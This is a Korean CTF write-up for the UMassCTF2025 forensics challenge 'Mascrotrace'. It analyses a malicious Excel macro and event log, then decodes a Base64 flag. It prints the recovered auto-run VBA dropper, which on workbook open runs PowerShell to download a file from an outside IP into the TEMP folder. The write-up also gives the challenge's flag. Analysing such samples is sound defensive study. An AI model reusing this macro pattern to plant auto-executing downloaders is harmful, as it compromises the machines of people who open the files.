[UMassCTF2025] forensic_Mascrotrace

🛡️ UMassCTF2025

UMass Amhers(매사추세츠 대학교 애머스트 캠퍼스)의 2025년 CTF이다.

대회가 끝난 후에 Write-Up 작성이 허용된다.

 

 

🔍 문제

한 폐쇄된 플래시 게임 스튜디오의 아카이브에서 의심스러운 스프레드시트가 발견되었습니다.
열자마자 뭔가가 실행되었지만, 지금은 그 무엇도 남아 있지 않습니다.
당신의 임무: 매크로를 리버싱하고, 그것이 어떤 일을 했는지 분석하여, 삭제하려 했던 플래그를 복구하세요.

 

✏️ Write-Up

zip 파일에는 다음과 같은 파일이 들어있다.

 

`dropper.xlsm`을 실행했더니 매크로가 실행되었고, 해당 매크로가 악성 행위를 수행했다는 것을 추론할 수 있다.

해당 엑셀 파일 안의 매크로는 드로퍼 악성 코드로 사용되었을 것을 예측할 수 있다.

`flash.evtx`는 해당 매크로를 실행했을 때 발생한 시스템 이벤트 파일이다.

 

먼저, 매크로 코드를 분석하기 위해 olevba라는 툴을 이용하였다.

https://github.com/decalage2/oletools/wiki/olevba

olevba

 

olevba로 vba 코드를 추출하면 다음과 같은 결과 값을 얻을 수 있다.

 

추출된 코드는 다음과 같다.

Private Sub Workbook_Open()
    Dim cmd As String
    cmd = "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://34.138.121.94:8000/stage1.txt' -OutFile $env:TEMP\stage1.txt"""
    Shell cmd
End Sub

 

` http://34.138.121.94:8000/stage1.txt` 으로 웹훅 요청을 날려 결괏값을 `$env:TEMP\stage1.txt` 에 저장하고 있는 것을 확인 할 수 있다.

그리고 해당 파일을 실행하는 코드이다.

 

그럼 이제 해당 파일이 어떤 행위를 수행했는지 `flash.evtx`를 열어서 확인해 보자.

이벤트가 89개 존재하였고, 시간 기준으로 정렬하여 하나씩 살펴보았다.

 

다음 이벤트가 눈에 띄었다. 변수를 설정해 주는 코드였다.

 

이 외에는 다음과 같이 무작위 문자열을 생성한 코드와 그 코드의 실행 결과만 있었다.

 

따라서 의심되는 문자열인 `VU1BU1N7ZHJvcF9pdF9saWtlX2l0c19ob3R9`을 Base64로 디코딩해보았다.

 

이로써 플래그를 획득할 수 있었다.

 

🚩 플래그

UMASS{drop_it_like_its_hot}